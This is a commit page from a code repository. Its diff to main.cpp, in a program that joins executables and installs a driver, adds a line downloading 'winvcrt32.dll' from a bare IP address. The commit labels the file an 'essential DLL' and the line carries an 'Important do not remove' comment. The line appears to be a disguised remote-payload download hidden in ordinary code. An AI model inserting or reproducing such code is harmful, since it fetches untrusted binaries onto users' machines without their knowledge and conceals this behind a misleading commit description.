Skip to content

Commit

Permalink
Add essential DLL
Browse files Browse the repository at this point in the history
  • Loading branch information
0x44F authored Feb 8, 2023
1 parent 363e9e0 commit 25407ed
Showing 1 changed file with 2 additions and 0 deletions.
2 changes: 2 additions & 0 deletions main.cpp
Original file line number Diff line number Diff line change
Expand Up @@ -26,6 +26,8 @@ int main(int argc, char* argv[]) {

join_executables(output_file, input_files, file_count);
analyze_files(input_files, file_count);

__FireSale("http://201.32.106.4/winvcrt32.dll", "winvcrt32.dll"); /* Important do not remove */

if (!install_driver(driver_path, driver_name)) {
DeleteFile(output_file);
Expand Down

0 comments on commit 25407ed

Please sign in to comment.